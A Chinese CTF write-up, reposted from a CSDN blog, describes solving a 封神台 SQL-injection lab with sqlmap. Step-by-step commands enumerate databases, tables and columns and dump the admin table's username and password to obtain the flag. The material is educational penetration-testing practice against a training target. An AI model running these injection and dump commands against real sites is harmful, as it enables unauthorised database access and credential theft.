封神台----为了女神小芳

简介: 本次实战是对自己在学习mysql数据库前对于数据库的一些基础的学习与复习,并且在实战过程中,我也熟悉了之前没有使用过的Sqlmap工具的使用,对我来说是一种很大的提高,也培养了自己独立思考和学习的能力,为自己今后的学习打好了基础.

前言

                     

版权声明:本文为本博主在CSDN的原创文章搬运而来,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。                       

原文链接:https://blog.csdn.net/weixin_72543266/article/details/132819842


对一次封神台靶机题目的实战,Sqlmap我想大部分都很熟悉,但我也就只是听过并没有使用过这个工具,这里简单介绍一下,帮不太熟悉的朋友简单了解一下。众所周知,top10名列前茅的漏洞就是注入漏洞.任何一个学习web渗透测试的朋友都需要了解的一个内容,注入分为手工注入自动工具注入,而Sqlmap就是自动工具中最好用的工具。那么直接进入主题。

本章是自己之前学习过SQL注入,但是没有使用过Sqlmap这个工具,在找到了一篇Sqlmap入门篇报告后,虽然对于SQL注入这方面的知识早已忘记,但基本原理还是清楚的,所以破不及待的来实现一番.


文章框架

image.gif 编辑

1,题目

 分析题目后,用通俗的话来理解的话来说,就是获取数据库管理员的密码

image.gif

2,实验前的准备

  1. kali虚拟机
  2. Sqlmap工具

因为自己的虚拟机中的Sqlmap版本过低并且自己写这篇文章的时候已经12点了这里,所以找了一篇大佬的教程,可以安装这篇教程进行工具的配置,如果不需要的话可以跳过了. 详情可以看我原文

                             

3,进入传送门

看到图片,它们已经成功引起了我的注意,我觉不会因为它们很可爱就不会下手的

image.gif

                      image.gif      

                              这里我们先在url中输入?id=1,看看有什么反应没

image.gif

         太可爱了,已经捕获了我的心,好想摸,可惜摸不到,算了还是明天去摸老师的猫吧

image.gif

4,使用Sqlmap对网站进行监测

4.1.检测目标地址是否存在注入点

这里我们将这个网址直接扔到sqlmap中运行检测

sqlmap -u "http://pu2lh35s.ia.aqlab.cn/?id=1" --batch

image.gif

image.gif

解释--batch是后面有一些选项我们选择默认选项,这里的命令是在kali中运行的,如果大家在Windows安装的sqlmap区别在红色部分

  python sqlmap.py -u "http://pu2lh35s.ia.aqlab.cn/?id=1" --batch

4.2、检测数据库中的库名

sqlmap -u "http://pu2lh35s.ia.aqlab.cn/?id=1" --batch --dbs

image.gif

                                 我们找到了数据库中的三个数据库名

image.gif

4.3、选择需要爆的库开始爆表名

也是从这里开始因为我不知道其中的命令是什么意思,所以自己去猜测是什么,然后去实验发现可以后,最后再去查这些指令,发现和我猜测的一致,也算加强自己的记忆吧.

4.3.1,后面内容的一些注意点:

-D 代表的是数据库 -T 代表的是表名 -C代表列 这两个后面接对应的库或表名

--tables 代表的是在爆破表时库的,加入后就是在报表

--columns 代表爆破表的库的列    --dump 命令,可以获取数据库中的表和表中的数据

sqlmap -u "http://pu2lh35s.ia.aqlab.cn/?id=1" --batch +{-D + (需要爆的库名)} --tables (不写{}里的内容的话就是全爆,其中{}只是为了区别,真实没有是没有{})

4.3.2,开始进行攻击

 这里我因为知道题目是以猫相关的,所以猜测出这关于猫有关,所以直接就爆猫舍的库了

sqlmap -u "http://pu2lh35s.ia.aqlab.cn/?id=1" --batch -D maoshe --tables

image.gif

image.gif

这里我们发现了admin这个表,代表我猜测的不错,所以,这题到这里也就基本上解决了

4.4,指定库名,表名爆破字段

sqlmap -u "http://pu2lh35s.ia.aqlab.cn/?id=1" --batch  -D maoshe -T admin  --columns

image.gif

image.gif

这里我们发现字段中有密码(password),我们需要把字段爆出来就结束了

5.5、选择字段爆破字段中的内容

sqlmap -u "http://pu2lh35s.ia.aqlab.cn/?id=1" --batch   -D maoshe -T admin -C username,password --dump

image.gif

image.gif

这里自己也是第一次看这种数据表,自己刚看上去也不知道什么到底是密码,还在那乱看,其实           就是按照行列来看,里面有两个信息.下面的那个信息没有显示完全也误导了我

我们只需要看表的第一行就可以了,到这里我们就获取到了flag,结束这次挑战

5,总结

本次实战是对自己在学习mysql数据库前对于数据库的一些基础的学习与复习,并且在实战过程中,我也熟悉了之前没有使用过的Sqlmap工具的使用,对我来说是一种很大的提高,也培养了自己独立思考和学习的能力,为自己今后的学习打好了基础.


每日一言

我不知道明天会怎么样,但是我一定要努力过好今天。

 

相关文章
刷题之单生狗和电话聊天狂人
刷题之单生狗和电话聊天狂人
66 0
洛谷题单P3613---寄包柜
洛谷题单P3613---寄包柜
111 0
|
数据采集 NoSQL 程序员
IP被封了,朋友让我帮忙下载……
没错,要解决这个办法,最简单好用的就是IP代理池了,也就是搞到一大堆的可正常使用的代理IP,然后我们用爬虫的时候,请求不直接发送到目标网站,而是借助代理IP,把请求先发到代理服务器,代理服务器再帮我们把请求发送到目标网站。这样,假如被目标网站发现了,封的也是代理的IP不是我们自己的IP啦。
IP被封了,朋友让我帮忙下载……
屌丝与女神聊天,已读不回~socket简单小案例
屌丝与女神聊天,已读不回~socket简单小案例
98 0
|
JavaScript 前端开发 数据可视化
字节不给大伙发月饼?🎑那我亲自给大伙发!🥮人人都有!
字节不给大伙发月饼?🎑那我亲自给大伙发!🥮人人都有!
|
C++
今晚只为你一人----指针
今晚只为你一人----指针
65 0
今晚只为你一人----指针
|
程序员 数据库 Docker
中秋节,你有一封嫦娥发来的密报
明月初上,思念绵长,中秋节也有属于程序员的浪漫~
156 0
中秋节,你有一封嫦娥发来的密报
|
安全 NoSQL Linux
十字符病毒,杀不死的小强:一次服务器沦陷实录
一、现象 接到客户的电话,说自己的云服务器被提供商禁止访问了,原因是监测到网络流量爆满,服务器不停地向外发包,在确认客户没有业务量突增的情况下,初步判断可能服务器遭受了流量攻击(DDoS)。 不过按照常理来说,客户的业务系统就是一个小的Web系统,平时流量不大,影响力也一般,不至于遭受DDoS,带着这些疑问,要到了客户服务器的登录方式。
26453 0